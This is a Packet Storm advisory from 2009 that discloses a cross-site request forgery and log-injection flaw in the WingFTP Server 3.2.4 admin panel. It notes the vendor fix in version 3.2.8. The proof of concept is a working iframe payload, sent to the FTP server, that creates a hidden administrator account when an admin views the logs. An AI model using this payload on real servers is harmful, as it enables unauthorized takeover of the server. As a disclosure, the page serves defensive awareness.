what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WingFTP 3.2.4 Cross Site Request Forgery

WingFTP 3.2.4 Cross Site Request Forgery
Posted Dec 31, 2009
Authored by Ams

WingFTP version 3.2.4 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | b59dc9a226776116ef463203bc6f45c9546d3061b923e74c7c8abc66701ec2a8

WingFTP 3.2.4 Cross Site Request Forgery

Change Mirror Download
Application: WingFTP Server 3.2.4 (maybe earlier versions too)
Link: http://www.wftpserver.com/
Vulnerability: CSRF
Author: Ams
Contact:
mail: ax330d [at] gmail [dot] com
site: http://www.0x416d73.name/

1. About software

"Wing FTP server is not only a FTP server. It's a multi-protocol file server(FTP,
HTTP, FTPS, HTTPS, SFTP) for Windows, Linux, Mac, freeBSD and Solaris. It
includes a new set of advanced tools (web based remote control, web based
client, administrator console, task scheduler). It provides event manager for the
program to respond to different events, scripts support let users extend the server
by Lua language, virtual directories for easy sharing files and directories, and more ... "

2. Vulnerability details

Wing FTP server web based administration panel provides option to view logs.
We can watch logs by opening
[Domains -> your.domain -> Logs & Status -> Domain Log (or Activity)]
These logs are opened directly from file to ajax'ed tag <div>. So, everything
that we send to ftp-server appears on the screen of browser. Without any
filtering. That's why we are capable of exploiting this bug.

3. Proof of concept

Actually, via this CRSF we can do all things administrator can do from his
control panel. The following exploit creates new administrator.

To show the work of exploit you have to do the following:
1. Connect to remote ftp server
2. Send this string:
<iframe src='http://127.0.0.1:5466/admin_addadmin.html?admin={"username":"Ams","password":"pwnpwnpwn","oldpassword":"","readonly":0,"ipmasks":[]}' width='0' height='0' border='0'></iframe>
3. When administrator logins and opens log new administrator is created
4. Login as admin 'Ams' and password 'pwnpwnpwn' (if you have not changed them)

4. Vendor response

Wing FTP Server team has fixed bugs and released new version - Wing FTP Server 3.2.8.

5. Disclosure timeline

25/12/2009 - Vendor informed
26/12/2009 - Received response
30/12/2010 - Bug fixed by vendor
31/12/2010 - Public release of advisory

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close